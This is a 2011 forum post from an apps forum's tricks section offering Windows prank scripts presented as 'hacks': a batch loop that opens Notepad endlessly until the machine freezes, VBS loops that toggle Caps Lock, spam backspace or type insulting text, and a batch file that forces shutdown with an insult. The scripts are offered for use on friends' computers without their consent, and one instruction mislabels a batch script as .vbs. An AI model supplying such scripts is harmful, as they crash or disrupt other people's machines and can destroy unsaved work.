APPZXOR
Hello and welcome to APPZXOR,

We would appreciate if you register so you can enjoy
the full benefits of browsing, viewing and using our forum.
Here are some features:

• Create threads;
• Reply to threads;
• View links & images;
• Leave positive or negative feedback to a member.

What are you waiting for? Go ahead and register!
It's free, quick and easy!
APPZXOR
Hello and welcome to APPZXOR,

We would appreciate if you register so you can enjoy
the full benefits of browsing, viewing and using our forum.
Here are some features:

• Create threads;
• Reply to threads;
• View links & images;
• Leave positive or negative feedback to a member.

What are you waiting for? Go ahead and register!
It's free, quick and easy!
APPZXOR
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Where Applications Become AppZ. Join Us Now!
 
HomePortalSearchLatest imagesRegisterLog in
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» See you next decade.
computer freezes and crashes Icon_minitimeby LarsValraz Fri Sep 09, 2022 4:43 pm

» Clean Up On Database
computer freezes and crashes Icon_minitimeby Vex338 Mon Jul 06, 2020 2:59 pm

» Guess who's back!
computer freezes and crashes Icon_minitimeby Vex338 Thu Feb 01, 2018 12:16 pm

» [COC] Clash of Clans
computer freezes and crashes Icon_minitimeby D'ShadowZRay Thu Jan 28, 2016 12:10 am

» iam new
computer freezes and crashes Icon_minitimeby D'ShadowZRay Thu Jan 28, 2016 12:06 am

» I need some help
computer freezes and crashes Icon_minitimeby akumasan_01 Fri May 01, 2015 1:25 pm

» HELLO GUYS! :))
computer freezes and crashes Icon_minitimeby Appz-RhastaSix Fri Sep 19, 2014 9:14 am

» Visual C# Programming Basics
computer freezes and crashes Icon_minitimeby Appz-RhastaSix Wed Sep 10, 2014 9:03 am

» Old Game!
computer freezes and crashes Icon_minitimeby iRegen Tue May 13, 2014 12:28 am


Top posters
[Detheroc_93]
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
MrStar
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
kurosakinaruto
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
GreyPhantom
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
ShadowSonic
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
Appzwesley29
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
z_f
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
MasterGandeo
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
Vex338
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 
wafumon
computer freezes and crashes I_vote_lcapcomputer freezes and crashes I_voting_barcomputer freezes and crashes I_vote_rcap 

Share | 
 

 computer freezes and crashes

View previous topic View next topic Go down 
AuthorMessage
burizangzaza
Super Member

burizangzaza

Posts : 173
Join date : 2011-08-21
Age : 29
Location : in ur face ^_^

computer freezes and crashes Empty
PostSubject: computer freezes and crashes   computer freezes and crashes Icon_minitimeTue Nov 29, 2011 5:10 pm

This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK
This constantly turns caps lock on and off really fast continuously.

Code:-
Code:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK
This makes it so the backspace key is constantly being pressed.

Code:-
Code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Convey your friend a message and shut down his / her computer:

Code:
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .
Back to top Go down
 

computer freezes and crashes

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
APPZXOR :: Discussions :: Tricks & Tutorials-
Free forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com